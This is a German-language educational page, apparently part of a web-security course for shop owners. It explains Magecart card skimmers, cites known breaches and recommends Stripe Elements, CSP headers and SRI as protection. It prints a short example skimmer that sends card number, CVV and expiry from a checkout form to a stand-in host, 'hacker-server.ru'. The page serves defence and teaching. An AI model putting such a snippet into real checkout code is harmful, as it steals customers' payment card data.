←
04 — Skimmer
1
Was ist ein Skimmer?
Ein Skimmer ist ein winziges Stück JavaScript, das der Hacker heimlich in deinen Checkout einschleust. Es hört zu, wenn der Kunde seine Karte tippt – und schickt die Daten zum Hacker, BEVOR der Bezahl-Anbieter sie bekommt.
Berühmt: British Airways (380.000 Karten geklaut), Ticketmaster, Newegg. Alles dieselbe Methode: Magecart.
2
🎮 Sieh den Skimmer arbeiten
⚠ Checkout mit Skimmer
3
Wie er reinkommt
Der Hacker schleust diese Zeile in eine deiner JS-Dateien ein:
bösartiges JS (gekürzt)
document.querySelector('#card-form')
.addEventListener('submit', e => {
fetch('https://hacker-server.ru/log', {
method: 'POST',
body: JSON.stringify({
nr: e.target.cardnr.value,
cvv: e.target.cvv.value,
exp: e.target.exp.value
})
});
});Oft 6+ Monate unbemerkt. Bei 100 Bestellungen/Tag = 18.000 Karten weg. Du erfährst es erst, wenn die Bank dich anruft.
4
🔍 Scanne deine echte Seite
Ohne CSP-, HTTPS- und Cookie-Header kann ein Magecart-Skimmer ungestört Karten klauen. Wir prüfen das.
🔍 Live-Scan: Skimmer-Schutz (CSP/Header)
Prüft CSP-, HTTPS- und Cookie-Header – ohne sie kann ein Skimmer ungestört Karten klauen.
5
✅ Wie schützt du dich?
- 💳 Stripe Elements: Die Karten-Felder laufen in einem iFrame von Stripe. Dein JS sieht die Karte NIE → kann sie nicht klauen.
- 🛡️ CSP-Header: Sagt dem Browser „lade NUR JS von meiner Domain". Hacker-JS von .ru wird blockiert.
- 🔍 SRI (Subresource Integrity): Hash-Prüfung, ob fremde Scripts manipuliert wurden.
Mit Stripe Elements + CSP ist Magecart praktisch unmöglich – egal wie tief der Hacker drin ist.
Test: F12 → Network-Tab. Bestelle was. Geht eine Anfrage an eine fremde Domain? → Skimmer-Verdacht.